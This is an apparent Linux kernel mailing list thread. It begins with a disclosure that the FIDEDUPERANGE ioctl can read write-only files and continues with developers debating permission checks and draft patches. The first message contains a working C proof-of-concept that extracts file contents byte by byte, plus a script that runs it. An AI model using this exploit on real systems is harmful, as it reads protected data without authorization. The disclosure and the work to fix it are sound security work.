* Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files @ 2022-07-12 12:11 Ansgar Lößer 2022-07-12 17:33 ` Linus Torvalds 0 siblings, 1 reply; 33+ messages in thread From: Ansgar Lößer @ 2022-07-12 12:11 UTC (permalink / raw) To: viro, linux-fsdevel, security; +Cc: Max Schlecht, Björn Scheuermann Dear Mr. Viro, using the deduplication API we found out, that the FIDEDUPERANGE ioctl syscall can be used to read a writeonly file. A more formal description of the bug, an example code to exploit it and a proposed solution are attatched below. In case of open questions please do not hesitate to contact us. With best regards, Ansgar Lößer FIDEDUPERANGE ioctl allows reading writeonly files The FIDEDUPERANGE ioctl can be used to read data from files that are supposed to be writeonly on supported file systems (btrfs, xfs, ...). confirmed on 5.18.3 (amd64, debian) Reported-by: Ansgar Lößer (ansgar.loesser@kom.tu-darmstadt.de), Max Schlecht (max.schlecht@informatik.hu-berlin.de) and Björn Scheuermann (scheuermann@kom.tu-darmstadt.de) The FIDEDUPERANGE ioctl is intended to be able to share physical storage for multiple data blocks across files that contain identical data, on the same file system. To do so, the ioctl takes a `src_fd` and `dest_fd`, as well as offset and length parameters, specifying data ranges should be tried to be deduplicated. The ioctl then compares the contents of the data ranges and returns the number of bytes that have been deduplicated. The issue is, that while `src_fd` has to be open for reading, `dest_fd` only has to be open for writing. Thus, multiple consecutive ioctl calls can be used to read out the contents of `dest_fd`. This is done byte by byte, by trying different input data, until getting a successful deduplication, indicating equal content in the two data ranges. This technique works even if files are marked as `append only` in btrfs. The proposed fix is to change the required permissions, so that `dest_fd` has to be open for reading as well. exploit code (`read_writeonly.c`) ```C #define _XOPEN_SOURCE 500 // pwrite #include <linux/types.h> #include <linux/fs.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sys/ioctl.h> #include <assert.h> // use FIDEDUPERANGE ioctl to compare the target writeonly file (dest_fd) // with the test file (src_fd) int compare_fds(int src_fd, int dest_fd, __u64 offset, __u64 length) { char buffer[sizeof(struct file_dedupe_range) + sizeof(struct file_dedupe_range_info)]; struct file_dedupe_range* arg = (struct file_dedupe_range*)buffer; arg->src_offset = 0; arg->src_length = length; arg->dest_count = 1; arg->reserved1 = 0; arg->reserved2 = 0; struct file_dedupe_range_info* info = &arg->info[0]; info->dest_fd = dest_fd; info->dest_offset = offset; info->reserved = 0; ioctl(src_fd, FIDEDUPERANGE, arg); printf("%d_%llu ", info->status, info->bytes_deduped); return info->status; } int main(int argc, char** argv) { if (argc != 2) { fprintf(stderr, "./read_writeonly <filepath>\n"); return 0; } // open the target writeonly file int target_fd = open(argv[1], O_WRONLY | O_APPEND); if (target_fd == -1) { fprintf(stderr, "failed to open \"%s\" with %d\n", argv[1], errno); return -1; } // create a test file to compare the target file with (via deduplication) int test_fd = open("test.tmp", O_RDWR | O_CREAT | O_TRUNC, 0777); if (test_fd == -1) { close(target_fd); fprintf(stderr, "fatal: failed to open test file with %d\n", errno); return -1; } __u64 file_offset = 0; do { int status; __u8 c; for (__u16 i = 0; i < 256; i++) { c = (__u8)i; __u64 offset = file_offset % 4096; __u64 length = offset + 1; __u64 block_offset = file_offset - offset; if (offset == 0) { ftruncate(test_fd, 0); } pwrite(test_fd, &c, 1, offset); status = compare_fds(test_fd, target_fd, block_offset, length); if (status == FILE_DEDUPE_RANGE_SAME || status < 0) { break; } } assert(status != FILE_DEDUPE_RANGE_DIFFERS); if (status < 0) { break; } putc(c, stdout); file_offset++; } while (1); close(target_fd); close(test_fd); unlink("test.tmp"); return 0; } ``` helper shell script (`test.sh`) ```sh #!/bin/sh gcc read_writeonly.c -o read_writeonly # create writeonly file touch writeonly.txt chmod 220 writeonly.txt echo "secret" > writeonly.txt sudo chown 65535 writeonly.txt # read from writeonly file ./read_writeonly writeonly.txt ``` proposed fix (read_writeonly.patch) ``` diff --git a/fs/remap_range.c b/fs/remap_range.c index e112b54..ad5b44d 100644 --- a/fs/remap_range.c +++ b/fs/remap_range.c @@ -414,11 +414,11 @@ static bool allow_file_dedupe(struct file *file) if (capable(CAP_SYS_ADMIN)) return true; - if (file->f_mode & FMODE_WRITE) + if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == (FMODE_READ | FMODE_WRITE)) return true; if (uid_eq(current_fsuid(), i_uid_into_mnt(mnt_userns, inode))) return true; - if (!inode_permission(mnt_userns, inode, MAY_WRITE)) + if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE)) return true; return false; } ``` -- M.Sc. Ansgar Lößer Fachgebiet Kommunikationsnetze Fachbereich für Elektrotechnik und Informationstechnik Technische Universität Darmstadt Rundeturmstraße 10 64283 Darmstadt E-Mail: ansgar.loesser@kom.tu-darmstadt.de http://www.kom.tu-darmstadt.de ^ permalink raw reply related [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 12:11 Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files Ansgar Lößer @ 2022-07-12 17:33 ` Linus Torvalds 2022-07-12 18:43 ` Matthew Wilcox ` (2 more replies) 0 siblings, 3 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-12 17:33 UTC (permalink / raw) To: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Josef Bacik, Miklos Szeredi Cc: Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann [ Adding random people who get blamed for lines in this remap_range thing to the participants ] On Tue, Jul 12, 2022 at 5:11 AM Ansgar Lößer <ansgar.loesser@tu-darmstadt.de> wrote: > > using the deduplication API we found out, that the FIDEDUPERANGE ioctl > syscall can be used to read a writeonly file. So I think your patch is slightly wrong, but I think this is worth fixing - just likely differently. First off - an odd technicality: you can already read write-only files by simply mmap'ing them, because on many architectures PROT_WRITE ends up implying PROT_READ too. So you should basically expect that "I have permissions to write to the file" automatically means that you can read it too. People simply do that "open for writing, mmap to change it" and expect it to work - not realizing that that means you have to be able to read it too. Anybody who thought otherwise was sadly wrong, and if you depend on "this is write-only" as some kind of security measure for secrets, you need to fix your setup. Now, is that a "feature or a bug"? You be the judge.It is what it is, and it's always been that way. Writability trumps readability, even if you have to do special things to get there. That said, this file remap case was clearly not intentional, and despite the mmap() issue I think this is just plain wrong and we should fix it as a QoI issue. A dedupe may only write to the destination file, but at the same time it does obviously have that implication of "I need to be able to read it to see that it's duplicate". However, your patch is wrong: > --- a/fs/remap_range.c > +++ b/fs/remap_range.c > @@ -414,11 +414,11 @@ static bool allow_file_dedupe(struct file *file) > > if (capable(CAP_SYS_ADMIN)) > return true; > - if (file->f_mode & FMODE_WRITE) > + if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == (FMODE_READ | > FMODE_WRITE)) > return true; This part looks like a good idea - although it is possible that people will argue that this is the same kind of issue as 'mmap()' has (but unlike mmap, we don't have "this is how the hardware works" issues, or "long history of uses"). But > - if (!inode_permission(mnt_userns, inode, MAY_WRITE)) > + if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE)) looks wrong. Note that readability is about the file *descriptor*, not the inode. Because the file descriptor may have been opened by somebody who had permission to read the file even for a write-only file. That happens for capability reasons, but it also happens for things like "open(O_RDWR | O_CREAT, 0444)" which creates a new file that is write-only in the filesystem, but despite that the file descriptor is actually readable by the opener. I wonder if the inode_permission() check should just be removed entirely (ie the MAY_WRITE check smells bogus too, for the same reason I don't like the added MAY_READ one) The file permission check - that was done at open time - is the correct one, and is the one that read/write already uses. Any permission checks done at IO time are basically always buggy: things may have changed since the 'open()', and those changes explicitly should *not* matter for the IO. That's really fundamentally how UNIX file permissions work. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 17:33 ` Linus Torvalds @ 2022-07-12 18:43 ` Matthew Wilcox 2022-07-12 18:47 ` Linus Torvalds 2022-07-12 19:02 ` Josef Bacik 2022-07-13 17:14 ` Ansgar Lößer 2 siblings, 1 reply; 33+ messages in thread From: Matthew Wilcox @ 2022-07-12 18:43 UTC (permalink / raw) To: Linus Torvalds Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Josef Bacik, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 10:33:01AM -0700, Linus Torvalds wrote: > [ Adding random people who get blamed for lines in this remap_range > thing to the participants ] > > On Tue, Jul 12, 2022 at 5:11 AM Ansgar Lößer > <ansgar.loesser@tu-darmstadt.de> wrote: > > > > using the deduplication API we found out, that the FIDEDUPERANGE ioctl > > syscall can be used to read a writeonly file. > > So I think your patch is slightly wrong, but I think this is worth > fixing - just likely differently. I'm going to leave discussing the permissions aspect to the experts in that realm, but from a practical point of view, why do we allow the dedupe ioctl to investigate arbitrary byte ranges? If you're going to dedupe, it has to be block aligned (both start and length). If we enforce that in the ioctl, this attack becomes impractical (maybe you can investigate 512-byte blobs of an 8192-bit key, but we seem to max out at 4096-bit keys before switching to a fundamentally harder algorithm). ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 18:43 ` Matthew Wilcox @ 2022-07-12 18:47 ` Linus Torvalds 2022-07-12 18:51 ` Linus Torvalds 0 siblings, 1 reply; 33+ messages in thread From: Linus Torvalds @ 2022-07-12 18:47 UTC (permalink / raw) To: Matthew Wilcox Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Josef Bacik, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 11:43 AM Matthew Wilcox <willy@infradead.org> wrote: > > I'm going to leave discussing the permissions aspect to the experts in > that realm, but from a practical point of view, why do we allow the dedupe > ioctl to investigate arbitrary byte ranges? If you're going to dedupe, > it has to be block aligned (both start and length). I agree, although I think that's a separate issue. I suspect it should just check for inode->i_blkbits alignment. I think that's what DIO does, and it seems like a sane minimum. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 18:47 ` Linus Torvalds @ 2022-07-12 18:51 ` Linus Torvalds 0 siblings, 0 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-12 18:51 UTC (permalink / raw) To: Matthew Wilcox Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Josef Bacik, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 11:47 AM Linus Torvalds <torvalds@linuxfoundation.org> wrote: > > I suspect it should just check for inode->i_blkbits alignment. I think > that's what DIO does, and it seems like a sane minimum. .. actually, looking closer, DIO also knows about and tries to deal with blksize_bits() of the underlying device. Which makes sense for IO patterns, because that's basically the "physical alignment" (vs "logical alignment") part. However, from a filesystem dedupe standpoint, I think the logical alignment is what matters, so just i_blkbits seems to be the best model. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 17:33 ` Linus Torvalds 2022-07-12 18:43 ` Matthew Wilcox @ 2022-07-12 19:02 ` Josef Bacik 2022-07-12 19:07 ` Linus Torvalds 2022-07-13 17:14 ` Ansgar Lößer 2 siblings, 1 reply; 33+ messages in thread From: Josef Bacik @ 2022-07-12 19:02 UTC (permalink / raw) To: Linus Torvalds Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 1:33 PM Linus Torvalds <torvalds@linuxfoundation.org> wrote: > > [ Adding random people who get blamed for lines in this remap_range > thing to the participants ] > > On Tue, Jul 12, 2022 at 5:11 AM Ansgar Lößer > <ansgar.loesser@tu-darmstadt.de> wrote: > > > > using the deduplication API we found out, that the FIDEDUPERANGE ioctl > > syscall can be used to read a writeonly file. > > So I think your patch is slightly wrong, but I think this is worth > fixing - just likely differently. > > First off - an odd technicality: you can already read write-only files > by simply mmap'ing them, because on many architectures PROT_WRITE ends > up implying PROT_READ too. > > So you should basically expect that "I have permissions to write to > the file" automatically means that you can read it too. > > People simply do that "open for writing, mmap to change it" and expect > it to work - not realizing that that means you have to be able to read > it too. > > Anybody who thought otherwise was sadly wrong, and if you depend on > "this is write-only" as some kind of security measure for secrets, you > need to fix your setup. > > Now, is that a "feature or a bug"? You be the judge.It is what it is, > and it's always been that way. Writability trumps readability, even if > you have to do special things to get there. > > That said, this file remap case was clearly not intentional, and > despite the mmap() issue I think this is just plain wrong and we > should fix it as a QoI issue. > > A dedupe may only write to the destination file, but at the same time > it does obviously have that implication of "I need to be able to read > it to see that it's duplicate". Yeah the implication is there of course, we might as well honor it I think? Clearly it's sort of silly to say that the write doesn't imply read, especially since we can get around it in other ways, but at the same time I don't really see a harm in adding the extra "hey I can read this too, right?" since DEDUPE does imply we need to be able to read both sides. > > However, your patch is wrong: > > > --- a/fs/remap_range.c > > +++ b/fs/remap_range.c > > @@ -414,11 +414,11 @@ static bool allow_file_dedupe(struct file *file) > > > > if (capable(CAP_SYS_ADMIN)) > > return true; > > - if (file->f_mode & FMODE_WRITE) > > + if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == (FMODE_READ | > > FMODE_WRITE)) > > return true; > > This part looks like a good idea - although it is possible that people > will argue that this is the same kind of issue as 'mmap()' has (but > unlike mmap, we don't have "this is how the hardware works" issues, or > "long history of uses"). > > But > > > - if (!inode_permission(mnt_userns, inode, MAY_WRITE)) > > + if (!inode_permission(mnt_userns, inode, MAY_READ | MAY_WRITE)) > > looks wrong. > > Note that readability is about the file *descriptor*, not the inode. > Because the file descriptor may have been opened by somebody who had > permission to read the file even for a write-only file. > > That happens for capability reasons, but it also happens for things > like "open(O_RDWR | O_CREAT, 0444)" which creates a new file that is > write-only in the filesystem, but despite that the file descriptor is > actually readable by the opener. > > I wonder if the inode_permission() check should just be removed > entirely (ie the MAY_WRITE check smells bogus too, for the same reason > I don't like the added MAY_READ one) > > The file permission check - that was done at open time - is the > correct one, and is the one that read/write already uses. > > Any permission checks done at IO time are basically always buggy: > things may have changed since the 'open()', and those changes > explicitly should *not* matter for the IO. That's really fundamentally > how UNIX file permissions work. > I don't think we should go this far, after all the normal write()/read() syscalls do the permission checking each time as well, so this is consistent with any other file modification operation. Of course it's racey, but we should probably be consistently racey with any other file modification operation. Thanks, Josef ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 19:02 ` Josef Bacik @ 2022-07-12 19:07 ` Linus Torvalds 2022-07-12 19:23 ` Linus Torvalds 2022-07-12 20:03 ` Josef Bacik 0 siblings, 2 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-12 19:07 UTC (permalink / raw) To: Josef Bacik Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 12:02 PM Josef Bacik <josef@toxicpanda.com> wrote: > > > Any permission checks done at IO time are basically always buggy: > > things may have changed since the 'open()', and those changes > > explicitly should *not* matter for the IO. That's really fundamentally > > how UNIX file permissions work. > > I don't think we should go this far, after all the normal > write()/read() syscalls do the permission checking each time as well, No, they really don't. The permission check is ONLY DONE AT OPEN TIME. Really. Go look. Anything else is a bug. If you open a file, and then change the permissions of the file (or the ownership, or whatever) afterwards, the open file descriptor is still supposed to be readable or writable. Doing IO time permission checks is not only wrong, it's ACTIVELY BUGGY, and is a fairly common source of security problems (ie passing a file descriptor off to a suid binary, and then using the suid permissions to make changes that the original opener didn't have the rights to do). So if you do permission checks at read/write time, you are a buggy mess. It really is that simple. This is why read and write check FMODE_READ and FMODE_WRITE. That's the *open* time check. The fact that dedupe does that inode_permission() check at IO time really looks completely bogus and buggy. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 19:07 ` Linus Torvalds @ 2022-07-12 19:23 ` Linus Torvalds 2022-07-12 20:03 ` Josef Bacik 1 sibling, 0 replies; 33+ messages in thread From: Linus Torvalds @ 2022-07-12 19:23 UTC (permalink / raw) To: Josef Bacik Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 12:07 PM Linus Torvalds <torvalds@linuxfoundation.org> wrote: > > Anything else is a bug. If you open a file, and then change the > permissions of the file (or the ownership, or whatever) afterwards, > the open file descriptor is still supposed to be readable or writable. .. it works the other way too. If you have higher capabilities and open a file, and then drop the capabilities after the open, the file descriptor is still supposed to be available. Again, doing some new permission check at IO time is wrong. Of course, the sad part is that we have done that wrong thing many times. Several /proc files have had fairly lax open-time permission checks, and then they do stricter checks at IO time, and it's been a serious security issue many many times. Similarly, the traditionally horribly broken BSD model of "do SCSI ioctl's using read/write calls" was a complete disaster in this area, exactly because the permission checks were then done based on the IO details (ie whatever command was written). And then that was fundamental to the whole interface, because some commands require more permissions than others, so you can't do the permission checks early. This is largely why we then have that "file->f_cred" thing, so that you can at least do things like "use the open-time credentials for checking at IO time". Or just say "if open-time credentials are different from IO time credentials, just abort". That solves the SUID issue when the actor permissions ("credentials") change, but it doesn't solve things like "somebody actually changed the target file permissions themselves" issue. So those really have to be tested at open time, and IO should not do "inode_permission()" checks, because it's just fundamentally too late by then. Of course, on eg stateless network filesystems, the IO-time permission checks may be the only ones that the server side *can* do, and then you end up with non-POSIX behavior and potential breakage. The world is a messy place. Linus ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 19:07 ` Linus Torvalds 2022-07-12 19:23 ` Linus Torvalds @ 2022-07-12 20:03 ` Josef Bacik 2022-07-12 20:48 ` Linus Torvalds 1 sibling, 1 reply; 33+ messages in thread From: Josef Bacik @ 2022-07-12 20:03 UTC (permalink / raw) To: Linus Torvalds Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 12:07:46PM -0700, Linus Torvalds wrote: > On Tue, Jul 12, 2022 at 12:02 PM Josef Bacik <josef@toxicpanda.com> wrote: > > > > > Any permission checks done at IO time are basically always buggy: > > > things may have changed since the 'open()', and those changes > > > explicitly should *not* matter for the IO. That's really fundamentally > > > how UNIX file permissions work. > > > > I don't think we should go this far, after all the normal > > write()/read() syscalls do the permission checking each time as well, > > No, they really don't. > > The permission check is ONLY DONE AT OPEN TIME. > > Really. Go look. > I did, I just misread what rw_verify_area was doing, it's just doing the security check, not a full POSIX permissions check, my mistake. > Anything else is a bug. If you open a file, and then change the > permissions of the file (or the ownership, or whatever) afterwards, > the open file descriptor is still supposed to be readable or writable. > > Doing IO time permission checks is not only wrong, it's ACTIVELY > BUGGY, and is a fairly common source of security problems (ie passing > a file descriptor off to a suid binary, and then using the suid > permissions to make changes that the original opener didn't have the > rights to do). > > So if you do permission checks at read/write time, you are a buggy > mess. It really is that simple. > > This is why read and write check FMODE_READ and FMODE_WRITE. That's > the *open* time check. > > The fact that dedupe does that inode_permission() check at IO time > really looks completely bogus and buggy. > Yeah I'm fine with removing the inode_permission(), I just want to make sure we're consistent across all of our IO related operations. It looks like at the very least we're getting security_*_permission on things like read/write/fallocate, so perhaps switch to that here and call it good enough? Thanks, Josef ^ permalink raw reply [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 20:03 ` Josef Bacik @ 2022-07-12 20:48 ` Linus Torvalds 2022-07-13 0:48 ` Darrick J. Wong 0 siblings, 1 reply; 33+ messages in thread From: Linus Torvalds @ 2022-07-12 20:48 UTC (permalink / raw) To: Josef Bacik Cc: ansgar.loesser, Darrick J. Wong, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann [-- Attachment #1: Type: text/plain, Size: 2628 bytes --] On Tue, Jul 12, 2022 at 1:04 PM Josef Bacik <josef@toxicpanda.com> wrote: > > Yeah I'm fine with removing the inode_permission(), I just want to make sure > we're consistent across all of our IO related operations. It looks like at the > very least we're getting security_*_permission on things like > read/write/fallocate, so perhaps switch to that here and call it good enough? remap_verify_area() already does that, afaik. The more I look at the remap_range stuff, the more I feel it is very ad-hoc and nobody really thought deeply about it. What about an append-only destination? Is that kind of write supposed to be ok because it's just REMAP_FILE_DEDUP? The open side should already have checked for IS_IMMUTABLE, but O_APPEND is a thing? I'm getting the feeling that somebody really needs to think about what the semantics should be. In the meantime, I think that requiring the block size alignment is the important part here. The "check read permissions" is kind of a non-issue, since we already have that mmap() case. Strangely, it *does* check that the position is aligned for remapping in .generic_remap_checks(). And not at all for dedupe. And even for remapping, the size alignment is a bit strange. It takes the "source EOF" into account, but what if the destination file is big enough that that's not the end? And the inode_permission() check is wrong, but at least it does have the important check there (ie that FMODE_WRITE one). So doing the inode_permissions() check at worst just makes it fail too often, but since it's all a "optimistically dedupe" anyway, that kind of "fail in odd situations" doesn't really matter. So for allow_file_dedupe(), I'd suggest: (a) remove the inode_permission() check in allow_file_dedupe() (b) remove the uid_eq() check for the same reason (if you didn't open the destination for write, you have no business deduping anything, even if you're the owner) (c) add a "can't do it for APPEND_ONLY" (but let the CAP_SYS_ADMIN override it) AND I'd add a "make sure it's all block-aligned" check for both the source and each destination chunk. Something like the attached, IOW. Entirely untested, this is not meant to be applied as-is, this is meant to be the basis of discussion. Btw, the generic_remap_file_range_prep() IS_IMMUTABLE check seems bogus too. How could it possibly be immutable if we've opened the target for writing? So all of this seems a bit confused. It really smells like "filesystem people wrote this with low-level filesystem rules in mind, rather than any kind of high-level understanding or conceptual rules" Hmm? Linus [-- Attachment #2: patch.diff --] [-- Type: text/x-patch, Size: 2238 bytes --] fs/remap_range.c | 27 +++++++++++++++++++-------- 1 file changed, 19 insertions(+), 8 deletions(-) diff --git a/fs/remap_range.c b/fs/remap_range.c index e112b5424cdb..ba71ceb8dde3 100644 --- a/fs/remap_range.c +++ b/fs/remap_range.c @@ -409,17 +409,12 @@ EXPORT_SYMBOL(vfs_clone_file_range); /* Check whether we are allowed to dedupe the destination file */ static bool allow_file_dedupe(struct file *file) { - struct user_namespace *mnt_userns = file_mnt_user_ns(file); - struct inode *inode = file_inode(file); - if (capable(CAP_SYS_ADMIN)) return true; + if (file->f_flags & O_APPEND) + return false; if (file->f_mode & FMODE_WRITE) return true; - if (uid_eq(current_fsuid(), i_uid_into_mnt(mnt_userns, inode))) - return true; - if (!inode_permission(mnt_userns, inode, MAY_WRITE)) - return true; return false; } @@ -428,6 +423,8 @@ loff_t vfs_dedupe_file_range_one(struct file *src_file, loff_t src_pos, loff_t len, unsigned int remap_flags) { loff_t ret; + struct inode *dst; + unsigned long blocksize; WARN_ON_ONCE(remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_CAN_SHORTEN)); @@ -457,10 +454,17 @@ loff_t vfs_dedupe_file_range_one(struct file *src_file, loff_t src_pos, goto out_drop_write; ret = -EISDIR; - if (S_ISDIR(file_inode(dst_file)->i_mode)) + dst = file_inode(dst_file); + if (S_ISDIR(dst->i_mode)) goto out_drop_write; ret = -EINVAL; + blocksize = 1ul << dst->i_blkbits; + if (dst_pos & (blocksize-1)) + goto out_drop_write; + if (len & (blocksize-1)) + goto out_drop_write; + if (!dst_file->f_op->remap_file_range) goto out_drop_write; @@ -488,6 +492,7 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same) int ret; u16 count = same->dest_count; loff_t deduped; + unsigned long blocksize; if (!(file->f_mode & FMODE_READ)) return -EINVAL; @@ -507,6 +512,12 @@ int vfs_dedupe_file_range(struct file *file, struct file_dedupe_range *same) if (!file->f_op->remap_file_range) return -EOPNOTSUPP; + blocksize = 1ul << src->i_blkbits; + if (off & (blocksize-1)) + return -EINVAL; + if (len & (blocksize-1)) + return -EINVAL; + ret = remap_verify_area(file, off, len, false); if (ret < 0) return ret; ^ permalink raw reply related [flat|nested] 33+ messages in thread
* Re: Information Leak: FIDEDUPERANGE ioctl allows reading writeonly files 2022-07-12 20:48 ` Linus Torvalds @ 2022-07-13 0:48 ` Darrick J. Wong 2022-07-13 2:58 ` Linus Torvalds 2022-07-13 17:16 ` Ansgar Lößer 0 siblings, 2 replies; 33+ messages in thread From: Darrick J. Wong @ 2022-07-13 0:48 UTC (permalink / raw) To: Linus Torvalds Cc: Josef Bacik, ansgar.loesser, Christoph Hellwig, Amir Goldstein, Mark Fasheh, Matthew Wilcox, Miklos Szeredi, Al Viro, linux-fsdevel, Security Officers, Max Schlecht, Björn Scheuermann On Tue, Jul 12, 2022 at 01:48:18PM -0700, Linus Torvalds wrote: > On Tue, Jul 12, 2022 at 1:04 PM Josef Bacik <josef@toxicpanda.com> wrote: > > > > Yeah I'm fine with removing the inode_permission(), I just want to make sure > > we're consistent across all of our IO related operations. It looks like at the > > very least we're getting security_*_permission on things like > > read/write/fallocate, so perhaps switch to that here and call it good enough? > > remap_verify_area() already does that, afaik. > > The more I look at the remap_range stuff, the more I feel it is very > ad-hoc and nobody really thought deeply about it. > > What about an append-only destination? Is that kind of write supposed > to be ok because it's just REMAP_FILE_DEDUP? The open side should > already have checked for IS_IMMUTABLE, but O_APPEND is a thing? This whole area of dedupe preconditions is a giant mess that makes my head hurt every time I think about it, so I don't really think about it. I hoisted all of it from btrfs to reuse the system call entry point without breaking existing userspace. Were I designing this from scratch for XFS, I would've required either CAP_SYS_ADMIN; or FMODE_READ on the src, and FMODE_READ|WRITE on the dest, and left it at that. Neither file can be IMMUTABLE because, frankly, I don't see much point in having such a flag if its behavior is the same as chmod 0000; I'll come back to this. Deduping between readable O_APPEND files would be fine because we're not writing to either file. (But that's my own fantasyland.) AFAICT, the reason why dedupe does all the weird checks it does is because apparently some of the dedupe tools expect that they can do weird things like dedupe into a file that they own but haven't opened for writes or could open for writes. Change those bits, and you break userspace. Given that you can already mmap the write-only file and read data from the mapping, I don't see what the leak is. If someone really wants to break userspace on these grounds, they can own all the howling that results. > I'm getting the feeling that somebody really needs to think about what > the semantics should be. > > In the meantime, I think that requiring the block size alignment is > the important part here. The "check read permissions" is kind of a > non-issue, since we already have that mmap() case. > > Strangely, it *does* check that the position is aligned for remapping > in .generic_remap_checks(). And not at all for dedupe. The dedupe implementations /do/ check file blocksize, it's under generic_remap_file_range_prep. The reason this exploit program works on the 7-byte file is that we stop comparing at EOF, which means that there are fewer bytes to guess. But. You can already read the file anyway. > And even for remapping, the size alignment is a bit strange. It takes > the "source EOF" into account, but what if the destination file is big > enough that that's not the end? generic_remap_check_len is supposed to catch those. > And the inode_permission() check is wrong, but at least it does have > the important check there (ie that FMODE_WRITE one). So doing the > inode_permissions() check at worst just makes it fail too often, but > since it's all a "optimistically dedupe" anyway, that kind of "fail in > odd situations" doesn't really matter. > > So for allow_file_dedupe(), I'd suggest: > > (a) remove the inode_permission() check in allow_file_dedupe() > > (b) remove the uid_eq() check for the same reason (if you didn't open > the destination for write, you have no business deduping anything, > even if you're the owner) So we're going to break userspace? https://github.com/markfasheh/duperemove/issues/129 > (c) add a "can't do it for APPEND_ONLY" (but let the CAP_SYS_ADMIN override it) > > AND I'd add a "make sure it's all block-aligned" check for both the > source and each destination chunk. ...and we're going to break deduping the EOF block again? > Something like the attached, IOW. Entirely untested, this is not meant > to be applied as-is, this is meant to be the basis of discussion. > > Btw, the generic_remap_file_range_prep() IS_IMMUTABLE check seems > bogus too. How could it possibly be immutable if we've opened the > target for writing? What /is/ the meaning of S_IMMUTABLE? Documentation/ only says that the fsverity author thinks it means "read-only contents". If it's the same as "chmod 0000" in that anyone with a writable fd can still modify the supposedly immutable file, then what was the point? The manual page for the getflags/setflags ioctls (~2017) say this: "FS_IMMUTABLE_FL 'i' The file is immutable: no changes are permitted to the file contents or metadata (permissions, timestamps, ownership, link count, and so on). (This restriction applies even to the superuser.) Only a privileged process (CAP_LINUX_IMMUTABLE) can set or clear this attribute." https://man7.org/linux/man-pages/man2/ioctl_iflags.2.html Going back to e2fsprogs 1.02 in 1997, the manual page for chattr says this: " i A file with the 'i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute." https://man7.org/linux/man-pages/man1/chattr.1.html To me, that sounds like you shouldn't be able to change the contents of an immutable file, full stop, and that's what the authors of the clone/dedupe/copy_file_range calls have all gone with. True, you can write() to such a file if you have a writable fd, but that's not what I would have expected from the documentation. ISTR Ted or someone muttering that the current behavior seems much more like a historical accident than planned out semantics. > So all of this seems a bit confused. It really smells like "filesystem > people wrote this with low-level filesystem rules in mind, rather than > any kind of high-level understanding or conceptual rules" Frankly, I don't know what all the high level conceptual rules are for Linux filesystems. They don't seem to be written down in Documentation/ and this has made writing fstests very difficult for me when I want to wire up XFS to some syscall or another, and what documentation there is doesn't seem to be consistent with what the kernel actually does. --D > Hmm? > > Linus > 